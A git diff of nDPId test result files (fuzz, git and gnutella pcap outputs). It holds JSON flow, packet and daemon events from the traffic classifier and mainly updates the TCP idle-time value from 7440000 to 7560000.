+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854565447,"flow_last_seen":1031854565700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":131,"packets-processed":117,"total-skipped-flows":0,"total-l4-data-len":22225,"total-not-detected-flows":3,"total-guessed-flows":27,"total-detected-flows":8,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":206,"global_ts_msec":1031854568982} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 131/117 diff --git a/test/results/git.pcap.out b/test/results/git.pcap.out index a45a6d23a..b3a825917 100644 --- a/test/results/git.pcap.out +++ b/test/results/git.pcap.out @@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"git.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1460821630164} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460821630164,"flow_last_seen":1460821630164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1460821630164,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460821630164,"flow_last_seen":1460821630164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1460821630164,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":90,"total-skipped-flows":0,"total-l4-data-len":68049,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1460821631269} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 90/90 diff --git a/test/results/gnutella.pcap.out b/test/results/gnutella.pcap.out index 90761e858..34889ed1f 100644 --- a/test/results/gnutella.pcap.out +++ b/test/results/gnutella.pcap.out @@ -114,190 +114,190 @@ 00423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":61191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":61191,"pkt":"UlQAEjUCCAAn5uVZCABFAAAegT8AAIARoX8KAAIPCgACAuETFOcACvHOAAA="} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61470,"flow_last_seen":61470,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":61470,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57620,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":61470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":61470,"pkt":"UlQAEjUCCAAn5uVZCABFAAAegUAAAIARoX4KAAIPCgACAuEUFOcACvHNAAA="} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61974,"flow_last_seen":61974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":61974,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 